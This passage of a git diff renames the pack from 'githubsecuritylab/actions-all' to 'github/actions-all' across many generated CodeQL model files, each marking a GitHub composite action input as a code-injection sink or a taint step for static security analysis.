b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index 5cf121dcef26..792a00ea3874 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index d946204e9b96..5ee9c5aefbed 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index c6839a7b004e..8b438734d5d6 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 9e708bbcc898..a62226055750 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index cfb67540b174..07c4cc427c10 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 7186433e6d27..77adcd6151d0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index d39aafe162ff..fe453b3086d2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index a3b53b3ec960..6d5296ba6d1f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 2a35d22a10e0..14600fdc23ef 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 156d244ece2d..a67988b08aa8 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index fcda4b3dfec0..663702e64180 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index 84877f57d8c2..de7a728d096c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index dcb93d013a09..360eb948595e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index 4776bb79067e..290712830e2c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 2540e6a76ca7..d58063c2452f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index 525064de6a97..784627c32abf 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index b46d5a3ee6a8..b4f5866b86d4 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 631457c813e4..77a7407adfbf 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index 44d9eb10a0dc..a97bce1de7a0 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index 0d7f80698f57..5bf814bcc693 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 84caa0434846..6a141053bbeb 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index f6aed253a21d..4fec81ed1780 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 1eac49617f22..1290646ef6dc 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 1efa6815c280..60a023c97301 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 91463a305dd9..1a99c3773de0 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 7ef240ad999c..e3cf5db0f15b 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index db953acf5bc7..67866c4f904c 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 7c1b01e14b5a..2317aa06ae2e 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index 37b67a933a3a..baf9c55ff182 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 570a9bdd142c..583be58ecd26 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index 8c1993c47ca6..e8250232853b 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index ee0adaadb3e2..d3172c566678 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index c127f03bb66d..7c1f9dac6bb6 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index 3b3d60fadd03..c77798c10222 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 4dd43acd2c53..3035324bee02 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index cb4bff25f9ac..dd208976fc51 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 39a204389b99..63f111f3e83c 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 6b4192c0c616..c330ca64c083 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index 63c3fc89058b..6b67c69e6e35 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 72772ae47cf7..135bb4baa8be 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43cc1e0187ea..c201386cf93f 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 7c80b7e6eda6..5e39d3f6c5f4 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 1f7b69e6254a..9a9f865b0db4 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 7879a7903b41..5c877a87d688 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index dbbd4c720ca4..6e9e83632904 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index f99698b19924..f0e62cdaec1a 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index a98a135d6b43..b1158922636e 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index 3ebb5e7acb32..78c1a3960566 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index b26aa6ea48b3..75c257f39ae7 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 683965e13d20..4d19b3ec0af1 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index 9358c895f3c2..b8bdc7276fbe 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 8233e5066033..220dbb58e025 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 2aea730db7e3..1992cbf46967 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index b03d23918825..02c01196842d 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - 